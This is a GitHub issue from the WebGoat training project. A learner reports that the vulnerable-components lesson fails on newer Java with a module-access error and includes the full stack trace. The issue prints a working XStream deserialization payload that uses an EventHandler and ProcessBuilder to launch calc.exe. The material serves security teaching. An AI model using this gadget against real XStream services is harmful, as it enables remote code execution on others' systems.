Skip to content

Vulnerable component lesson - java.desktop does not "opens java.beans" to unnamed module #1193

New issue
New issue
Closed
Closed
Vulnerable component lesson - java.desktop does not "opens java.beans" to unnamed module#1193
Assignees
nbaars
Labels
waiting for releaseIssue is fix, waiting on new release
Milestone
2023.0
@shanpig

Description

@shanpig
shanpig
opened on Dec 19, 2021

The command I ran to setup docker image is
docker run -p 8080:8080 -p 9090:9090 -p 80:8888 -e TZ=Europe/Amsterdam webgoat/goatandwolf:latest
After that I entered chapter A9 lesson 12
Searched for solutions, and get solutions like below:

<contact class='dynamic-proxy'>
 <interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
 <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

I am not a java developer so I assume that at the XStream unmarshalling process converts the XML into a class that registers an eventHandler. So whenever the Contact calls a method, the eventHandler gets triggered.
I got a lot blogposts results that showed this should work, but the problem is I got an error that I, as a java noob, has no idea how to solve.
When I use the above XML as input, I got the error:

Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e : 
Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e
n---- Debugging information ----
nmessage : Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e
ncause-exception : java.lang.reflect.InaccessibleObjectException
ncause-message : Unable to make field private java.lang.Object java.beans.EventHandler.target accessible: module java.desktop does not "opens java.beans" to unnamed module @1324409e
nclass : java.beans.EventHandlernrequired-type : java.beans.EventHandler
nconverter-type : com.thoughtworks.xstream.converters.reflection.ReflectionConverter
npath : /contact/handlernline number : 1
nclass[1] : com.thoughtworks.xstream.mapper.DynamicProxyMapper$DynamicProxynconverter-type[1] : com.thoughtworks.xstream.converters.extended.DynamicProxyConverter
nversion : 1.4.5
n-------------------------------

It seems to me that the org.owasp.webgoat.vulnerable_components.Contact might be an 'unnamed module' so that java doesn't process the xml?
Hope anybody could kindly shed some light for me

Metadata

Metadata

Assignees

Labels

waiting for releaseIssue is fix, waiting on new release

Type

No type

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions